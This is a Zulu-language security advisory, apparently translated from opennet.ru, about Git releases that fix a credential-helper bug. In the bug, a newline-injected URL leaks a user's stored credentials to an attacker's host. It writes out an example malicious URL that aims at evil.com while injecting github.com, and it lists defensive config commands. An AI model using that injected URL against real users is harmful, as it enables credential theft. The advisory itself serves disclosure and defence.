ukukhishwa okulungisayo kwesistimu yokulawula umthombo esabalalisiwe i-Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 kanye ne-2.17.4, ngaphakathi eyaqeda () kumphathi"", okubangela ukuthi imininingwane ithunyelwe kumsingathi ongalungile lapho iklayenti le-git lifinyelela indawo yokugcina lisebenzisa i-URL efomethwe ngokukhethekile equkethe uhlamvu lomugqa omusha. Ukuba sengozini kungasetshenziswa ukuhlela ukuthi iziqinisekiso ezivela komunye umsingathi zithunyelwe kuseva elawulwa umhlaseli.
Uma ucacisa i-URL efana ne-“https://evil.com?%0ahost=github.com/”, isibambi sokuqinisekisa lapho sixhuma kusokhaya evil.com sizodlula amapharamitha wokuqinisekisa ashiwo ku-github.com. Inkinga yenzeka lapho kwenziwa imisebenzi efana ne-"git clone", okuhlanganisa ukucutshungulwa kwama-URL amamojula angaphansi (isibonelo, "isibuyekezo semojula ye-git" sizocubungula ngokuzenzakalelayo ama-URL acaciswe kufayela elithi .gitmodules endaweni yokugcina). Ukuba sengozini kuyingozi kakhulu ezimeni lapho unjiniyela enza khona ikhosombe ngaphandle kokubona i-URL, isibonelo, lapho esebenza namamojula angaphansi, noma kumasistimu enza izenzo ezizenzakalelayo, ngokwesibonelo, kumaskripthi wokwakha iphakheji.
Ukuvimbela ubungozi ezinguqulweni ezintsha ukudlulisa uhlamvu olusha kunoma imaphi amanani adluliswa ngephrothokholi yokushintshisana kokuqinisekisa. Ngokusatshalaliswa, ungakwazi ukulandelela ukukhishwa kwezibuyekezo zephakheji emakhasini , , , , , , .
Njengendlela yokulungisa inkinga Ungasebenzisi i-credential.helper lapho ufinyelela amakhosombe omphakathi futhi ungasebenzisi i-"git clone" kumodi ye-"--recurse-submodules" enamakhosombe angahloliwe. Ukukhubaza ngokuphelele isibambi se-credential.helper, esikwenzayo kanye nokukhipha amaphasiwedi kusuka , kuvikelwe noma ifayela elinamagama ayimfihlo, ungasebenzisa imiyalo:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Source: opennet.ru